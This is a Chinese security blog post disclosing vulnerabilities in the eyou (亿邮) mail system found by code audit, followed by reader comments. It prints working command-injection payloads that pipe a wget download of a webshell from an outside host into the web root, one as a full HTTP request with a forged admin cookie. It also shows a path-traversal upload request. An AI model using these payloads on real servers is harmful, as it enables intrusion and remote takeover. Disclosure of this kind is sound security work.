您的位置 » 首页 » 代码审计 » 代码审计:eyou(亿邮)邮件系统两个getshell和两个有意思的漏洞

代码审计:eyou(亿邮)邮件系统两个getshell和两个有意思的漏洞

发表于3年前 | 作者: seay | 分类: 代码审计 | 孵化于:2014年07月23日 | 文章热度:35,725 次 全屏阅读

显示不全请点击全屏阅读

最近在给一家市值过百亿美金的公司做渗透测试,发现其中一个域名用的亿邮邮件系统,就顺便下了套亿邮的源码看了看,发现这套系统的安全性还停留在零几年,问题一大堆,找到一些getshell,简单列两个,再拧两个稍微有意思的漏洞分享一下,就不写详细分析了。

另外过段时间会更新一版代码审计系统,会加几种漏洞类型的审计规则,还有优化误报。这次发现亿邮的所有漏洞都是Seay源代码审计系统自动化挖掘到的。

命令执行1

http://host.com/swfupload/upload_files.php?uid=
|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=



命令执行2

GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1
Host: mail.host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 0
cookie: cookie=admin 1
DNT: 1
Connection: keep-alive

任意文件上传

Swfupload/upload_files.php? uid=admin&token=youtoken/../../

这里本来可以无需登陆直接上传任意文件的,但是在linux下,is_dir()函数判断一个路径是否是目录,在用../跳转目录时,必须路径中的目录都存在,但是windows下面可以是不存在的路径,到底是系统问题还是php问题,这个等有时间再去研究。

看看这个图就明白了

很多文件头顶还有一个文件包含,但是是http头里面的host字段,在网站是默认情况下,这个host是可以伪造的,但是不能有斜杠这域名中不存在的字符,否则会400错误,所以这里只能包含同目录下面的文件。

Tags:

Seay源代码审计系统, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/4011/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有8个筒子的人留下了脚印...

  • Master 说:
    1楼
    2014 年 7 月 23 日 下午 11:21 回复

    人类已经无法阻止你挖洞了。

  • hang333 说:
    2楼
    2014 年 7 月 24 日 上午 2:00 回复

    话说…你的源码哪里下的…

  • 非凡站长博客 说:
    3楼
    2014 年 7 月 29 日 上午 7:19 回复

    果然是见多识广啊 苦心钻研

  • acgt 说:
    4楼
    2014 年 7 月 31 日 下午 11:22 回复

    市值过百亿的,没有用亿邮的吧,阿里不清楚,百度 京东 360用ms exchange,唯品会用coremail,腾讯 网易用自家的

    • xxoo 说:
      2014 年 8 月 1 日 下午 6:14 回复

      再想想,过百亿的还有很多 😀

      • ooxx 说:
        2014 年 8 月 7 日 下午 7:52 回复

        小米?

  • alex 说:
    5楼
    2014 年 11 月 3 日 下午 7:27 回复

    😈 😉 😉 😉

  • 船长 说:
    6楼
    2015 年 12 月 4 日 下午 10:58 回复

    这个是eyou老版本v4的邮箱。新版本的好多了。

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)